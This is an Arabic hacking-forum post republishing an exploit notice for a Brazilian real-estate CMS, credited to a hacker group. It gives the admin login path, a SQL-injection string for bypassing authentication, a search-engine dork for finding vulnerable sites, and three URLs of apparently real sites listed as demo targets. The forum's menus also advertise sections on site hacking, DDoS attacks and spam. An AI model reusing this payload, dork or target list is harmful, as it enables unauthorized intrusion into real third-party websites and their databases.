تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



.:: قسم الثغرات ::. هذا القسم يختص باحدث الثغرات و طرق استغلالها ..

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية Rednfozi
Rednfozi

Rednfozi غير متواجد حالياً
 
رقم العضوية : 66880
تاريخ التسجيل : Oct 2018
مكان الإقامة :
عدد المشاركات : 4
عدد النقاط : 10
قوة التقييم :
افتراضي Brazil CMS admin Bypass and SQL Injection Vulnerability

كُتب : [ 10-01-2018 - 07:39 PM ]


كود PHP:
,--^----------,--------,-----,-------^--,

  | |||||||||   `
--------'     |          O .. by Rednofozi anonysec hackers iran  ..

  
`+---------------------------^----------|

    `
\_,-------, _________________________|

      / XXXXXX /
`|     /

     / 
XXXXXX /  `\   /

    / XXXXXX /\______(

   / XXXXXX /      

  / XXXXXX /

 (________(        

  
`------'



====================================================================================

# Exploit Title: Brazil CMS admin Bypass and SQL Injection Vulnerability

# Exploit Author: Rednofozi

# Date:29-09-2018

# Email: [email protected]

# Vendor Homepage: www.hamilimoveis.com.br

# OUR SITE : https://anonysec.org/

|====================================================================================

# {INFO}

# Page Admin : 

   site.br/adm 

   Bypass

   User & Pass :



    '
=' 'or

|====================================================================================

# {DORK}

# " inurl:detalhes_imovel.php?Cod=  site:br' 

|====================================================================================

|====================================================================================

# {DEMO}

# 01: http://www.ubatubaceliolocacoes.com/detalhes_imovel.php?Cod=41

# 02: http://www.imoveismanduri.com.br/detalhes_imovel.php?Cod=71

# 03: http://www.hamilimoveis.com.br/detalhes_imovel.php?Cod=137

# 04: admin bypass and SQL Injection

# 05

# 06:  

# 07: 

# 08:

# 09:

# 10:

|====================================================================================

# {TNX For}

# >>> Thanks To: ReZa CLONER  , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

# >>> Discovered By :Rednofozi

|====================================================================================

The END Good Luck :D:D:
http://www.exploit4arab.org/exploits/2054

توقيع : Rednfozi



رد مع إقتباس

اضافة رد

العلامات المرجعية


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة خطيرة جديد أدخل ورفع إندكس خاص بك Go Shop CMS bypass admin SQL Injection MrKurd .:: قسم الثغرات ::. 3 07-24-2016 06:10 AM
sobre_mim script Bypass / Sql Injection Vulnerability k2ll33d .:: قسم الثغرات ::. 7 03-26-2012 11:57 AM
humanCMS (Auth Bypass) SQL Injection Vulnerability mr.le0n .:: قسم الثغرات ::. 0 08-25-2009 11:09 AM
Logoshows BBS 2.0 (Auth Bypass) SQL Injection Vulnerability mr.le0n .:: قسم الثغرات ::. 0 08-17-2009 10:31 PM
MOC Designs PHP News v1.1 (Auth Bypass) SQL Injection Vulnerability mr.le0n .:: قسم الثغرات ::. 0 08-04-2009 10:21 PM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 12:33 AM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @ قسم الحقن المٌتقَدِّم [بداية العهد] @